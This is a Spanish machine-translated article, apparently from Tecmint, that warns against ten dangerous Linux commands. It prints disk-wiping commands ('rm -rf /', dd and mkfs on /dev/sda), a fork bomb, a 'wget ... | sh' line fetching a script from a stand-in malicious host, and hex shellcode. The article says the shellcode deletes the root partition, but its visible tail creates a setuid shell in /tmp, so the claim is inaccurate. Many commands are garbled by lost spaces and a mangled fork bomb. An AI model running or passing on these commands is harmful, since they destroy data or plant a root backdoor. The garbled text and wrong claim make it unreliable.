Los 10 comandos más peligrosos: nunca debería ejecutarlos en Linux

Los 10 comandos más peligrosos: nunca debería ejecutarlos en Linux

La línea de comandos de Linux es productiva, útil e interesante, pero a veces puede ser muy peligrosa, especialmente cuando no está seguro de lo que está haciendo. Este artículo no pretende enfurecerlo con Linux. o línea de comandos de Linux. Solo queremos que conozca algunos de los comandos que debe pensar dos veces antes de ejecutarlos.

Comandos peligrosos de Linux Dangerous Linux Commands 10 Dangerous Comandos de Linux

1. Comando rm-rf

El comando rm-rf. es una de las formas más rápidas de eliminar una carpeta y su contenido. Pero un pequeño error tipográfico o ignorancia puede resultar en un daño irrecuperable del sistema. Algunas de las opciones que se utilizan con el comando rm. son.

  1. El comando rm. en Linux se utiliza para eliminar archivos.
  2. El comando rm-r. elimina la carpeta de forma recursiva, incluso la carpeta vacía.
  3. El comando rm-f. elimina ‘Archivo de solo lectura’ sin preguntar.
  4. rm-rf/: fuerza la eliminación de todo en el directorio raíz.
  5. rm-rf *. fuerza la eliminación de todo en directorio actual/directorio de trabajo.
  6. rm-rf.. Forzar la eliminación de la carpeta y subcarpetas actuales.

Por lo tanto, tenga cuidado cuando está ejecutando el comando rm-rf. Para superar la eliminación accidental de un archivo con el comando ‘ rm. , cree un alias del comando ‘ rm. como ‘ rm-i. en “ .bashrc. ”, le pedirá que confirme cada eliminación.

2. : () : ;: Command

Lo anterior es en realidad una bomba de bifurcación. Opera definiendo una función llamada “:. , que se llama a sí misma dos veces, una en primer plano y otra en segundo plano. Sigue ejecutándose una y otra vez hasta que el sistema se congela.

: () : ;:

3. command>/dev/sda

El comando anterior escribe la salida del “ comando. en el bloque /dev/sda. El comando anterior escribe datos sin procesar y todos los archivos del bloque serán reemplazados por datos sin procesar, lo que resultará en una pérdida total de datos en el bloque.

4. mv folder/dev/null

freestar.config.enabled_slots.push

El comando anterior moverá ‘ carpeta. ‘a /dev/null. En Linux, /dev/null. o null. el dispositivo es un archivo especial que descarta todos los datos escritos en él e informa que la operación de escritura se realizó correctamente.

# mv/home/user/*/dev/null

El comando anterior moverá todo el contenido de un directorio Usuario. a /dev/null. lo que literalmente significa todo lo que se envió. a agujero negro. ( nulo).

5. wget http://fuente_ maliciosa-O-| sh

El comando anterior descargará un script de una fuente maliciosa y luego lo ejecutará. El comando Wget descargará el script y sh. ejecutará el script descargado.

Nota. debería ser mucho consciente de la fuente desde donde está descargando paquetes y scripts. Utilice únicamente aquellos scripts/aplicaciones que se descarguen de una fuente confiable.

6. mkfs.ext3/dev/sda

El comando anterior formateará el bloque ‘ sda’. y seguramente sabrá que después de la ejecución del comando anterior su Bloque ( Hard Disk Drive. sería nuevo, ¡A ESTRENAR!. Sin ningún dato, dejando su sistema en una etapa irrecuperable.

7.> archivo

El comando anterior se usa para vaciar el contenido del archivo. Si el comando anterior se ejecuta con un error tipográfico o ignorancia como “> xt.conf”. escribirá el archivo de configuración o cualquier otro sistema o archivo de configuración.

8. ^ foo ^ bar

Este comando, como se describe en nuestros 10 comandos de Linux menos conocidos, se usa para editar el comando de ejecución anterior sin la necesidad de volver a escribir el comando completo. Pero esto puede ser realmente problemático si no se arriesgó a verificar minuciosamente el cambio en el comando original usando el comando ^ foo ^ bar.

9. dd if =/dev/random of =/dev/sda

El comando anterior borrará el bloque sda. y escribirá datos basura aleatorios en el bloque. ¡Por supuesto! Su sistema quedaría en una etapa inconsistente e irrecuperable.

10. Oculto el comando

El siguiente comando no es más que el primer comando de arriba ( rm-rf. . Aquí los códigos están ocultos en hexadecimal. para que un usuario ignorante pueda ser engañado. Ejecutar el siguiente código en su terminal borrará su partición raíz.

Este comando aquí muestra que la amenaza puede estar oculta y normalmente no es detectable a veces. Debe ser consciente de lo que está haciendo y cuál sería el resultado. No compile/ejecute códigos de una fuente desconocida.

char esp [] __attribute__ ((section (“. Text”)))/* esp release */= “\ xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ x83 \ xec \ x64 \ x68 ″ “\ xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99 ″” \ xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7 ″ “\ x56 \ x04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ x83 \ xc4 \ x74 \ x56 ″“ \ x8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31 ″ “\ xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69 ″“ \ x6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00 ″ “cp-p/bin/sh/tmp/.beyond; chmod 4755/tmp/.beyond; ”;

Nota:. no ejecutes ninguno de los comandos anteriores en tu terminal o shell Linux. o en la computadora de tu amigo o de la escuela. Si desea probarlos, ejecútelos en una máquina virtual. Cualquier inconsistencia o pérdida de datos, debido a la ejecución del comando anterior, dañará su sistema, de lo cual ni el Autor. del artículo ni Tecmint. son responsables.

Eso es todo por ahora. Pronto estaré aquí de nuevo con otro artículo interesante que a la gente le encantará leer. Hasta entonces Esté atento y conectado a Tecmint. Si conoce otros comandos peligrosos de Linux. y desea que los agreguemos a la lista, infórmenos a través de la sección de comentarios y no se olvide de dar sus valiosos comentarios.